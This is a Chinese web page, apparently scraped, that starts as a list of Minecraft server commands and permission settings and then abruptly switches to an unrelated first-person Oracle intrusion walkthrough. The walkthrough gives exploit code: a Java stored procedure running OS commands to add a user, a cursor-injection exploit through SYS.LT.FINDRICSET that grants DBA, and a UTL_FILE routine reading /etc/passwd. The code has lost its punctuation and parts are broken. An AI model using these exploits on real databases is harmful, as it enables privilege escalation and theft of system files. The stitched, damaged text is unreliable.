minecraft服务器权限如何设置

minecraft服务器权限如何设置,第1张

spawn

传送到主城

/register

密码

#注册账号

/login

密码

#登陆账号

/money

#查看金钱

/psy

名字

钱数

给予别人金钱

/sethome

#设置自己的家

/home

#回到自己设置的家

/spawn

#传送到出生点

/back

#回到上一次传送点(例如死后回尸体处)

[private]

物品上锁

把木牌放到箱子前,输入:

第一行:[Private]

第二行:空

第三行:可以用这个箱子的其他人

第四行:可以用这个箱子的其他人

/getpos

#显示坐标

/setwarp

[warp点]

#设置公共传送点

/warp

[warp点]

#传送到指定传送点

/tpa

<玩家ID>

#请求传送到玩家player所在位置

/tpahere

<玩家ID>

#请求玩家player传送到自己所在位置

/tpaccept

#接受玩家传送的请求

/tpdeny

#拒绝玩家传送的请求

/res

create

[领地名]

-

选择好区域后创建一个叫做[领地名]的领地

/res

remove

[领地名]

-

移除一个叫[领地名]的领地

/res

removeall

-

移除所有领地

/res

subzone

<领地名>

[子区域名]

-

在领地内创建一块子区域,你必须是所有者才行。

/res

info

[领地名]

-

查询领地权限

以下为权限设置(true为开启,false为关闭)

/res

set

【领地】

【具体权限】

true/false

将你的领地设定权限是否开启

/res

pset

【领地】

【玩家名字】

【具体权限】

true/false

将你的领地开放或关闭给某玩家一个具体的权限

admin:领地的全权管理权限,仅能给与某玩家

container:是否能使用箱子,发射器等

bucket:设置是否能使用桶

ignite:点火的权限

piston:活塞是否能使用

build:建造权限(包括destroy和place)

destroy:毁坏权限

place:放置权限e

move:进入权限

tp:传送权限

use:使用权限(工作台,炉子等)

subzone:是否能设置子空间

tnt:设置tnt是否有效

creeper:设置JJ怪是否有效(设置F的话JJ怪就废了)

damage:设置领地内是否能造成伤害(不能防止被挤死)

monsters:设置是否刷新怪物

animals:设置是否刷新动物

firespread:火是否能蔓延

flow:液体流动,包括waterflow和lavaflow

waterflow:水的流动

lavaflow:岩浆流动

healing:设置是否能恢复生命

pvp:设置是否能pvp

求采纳

服务器CMD设置:在开启服务器后有一个CMD指令框,玩家们只要在CMD中输入OP 玩家ID,即可给这名玩家添加OP权限。游戏中添加:游戏中持有OP权限的玩家,可以在对话框中输入/op 玩家ID,来给予其他玩家OP权限。

服务器文件修改:在服务器文件列表中有一个Ops.txt的文件夹,在文件夹中输入需要OP权限的玩家ID保存即可。游戏创始人为马库斯·佩尔松,也称为notch,其灵感源于《无尽矿工》、《矮人要塞》和《地下城守护者》。

玩家可以在游戏中的三维空间里创造和破坏各种各样的方块,甚至在多人服务器与单人世界中体验不同的游戏模式,在高度的自由中,玩家们也自己创作出了大大小小的玩法,打造精美的建筑物,创造物和艺术品。且游戏平台已囊括了移动设备和游戏主机。

很快便连接上oracle服务器 此时发现

连接后不是dba权限

不能利用SYS DBMS_EXPORT_EXTENSION GET_DOMAIN_INDEX_TABLES漏洞提升权限

运行SELECT UTL_HTTP request( ) FROM dual 后发现oracle服务器不能连接网络

幸运的是

运行

create or replace function Linx_Query (p varchar ) return number authid current_user is begin execute immediate preturn end

成功!这个用户具有create proceduce权限

此时马上想到创建java扩展执行命令

create or replace and pile java source named LinxUtil as import java io *public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime getRuntime() exec(args) getInputStream() ) )String stemp str= while ((stemp = myReader readLine()) != null) str +=stemp+ myReader close()return str} catch (Exception e){return e toString()}}}

begin dbms_java grant_permission( PUBLIC SYS:java io FilePermission <>execute )end

create or replace function LinxRunCMD(p_cmd in varchar ) return varchar as language java name LinxUtil runCMD(java lang String) return String

select * from all_objects where object_name like %LINX%

grant all on LinxRunCMD to public

select LinxRunCMD( cmd /c net user linx /add ) from dual

但是在第一步就卡住了 服务器由于某种未知原因 不能创建java扩展!!

还好 我们还有UTL库可以利用

create or replace function LinxUTLReadfile (filename varchar ) return varchar is

fHandler UTL_FILE FILE_TYPE

buf varchar ( )

output varchar ( )

BEGIN

fHandler := UTL_FILE FOPEN( UTL_FILE_DIR filename r )

loop

begin

utl_file get_line(fHandler buf)

DBMS_OUTPUT PUT_LINE( Cursor: ||buf)

exception

when no_data_found then exit

end

output := output||buf||chr( )

end loop

UTL_FILE FCLOSE(fHandler)

return output

END

UTL_FILE_DIR需要先用

CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS /etc

指定目 但运行后发现没有权限 只好想办法提权

***************游标注射***************

老外写了N个pdf介绍这技术 我精简了代码

DECLARE

MYC NUMBER

BEGIN

MYC := DBMS_SQL OPEN_CURSOR

DBMS_SQL PARSE(MYC declare pragma autonomous_transactionbegin execute immediate GRANT DBA TO linxlinx_current_db_user mitend)

DBMS_OUTPUT PUT_LINE( Cursor: ||MYC)

BEGIN SYS LT FINDRICSET( ||dbms_sql execute( ||MYC|| )|| )– x )END

raise NO_DATA_FOUND

EXCEPTION

WHEN NO_DATA_FOUND THEN DBMS_OUTPUT PUT_LINE( Cursor: ||MYC)

WHEN OTHERS THEN DBMS_OUTPUT PUT_LINE( Cursor: ||MYC)

END

运行后重新连接就有dba权限了 简单吧……

现在可以读取文件了

CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS /etc

select LinxUTLReadfile( passwd ) from dual

lishixinzhi/Article/program/Oracle/201311/16747


欢迎分享,转载请注明来源:夏雨云

原文地址:https://www.xiayuyun.com/zonghe/284191.html

(0)
打赏 微信扫一扫微信扫一扫 支付宝扫一扫支付宝扫一扫
上一篇 2023-04-22
下一篇2023-04-22

发表评论

登录后才能评论

评论列表(0条)

    保存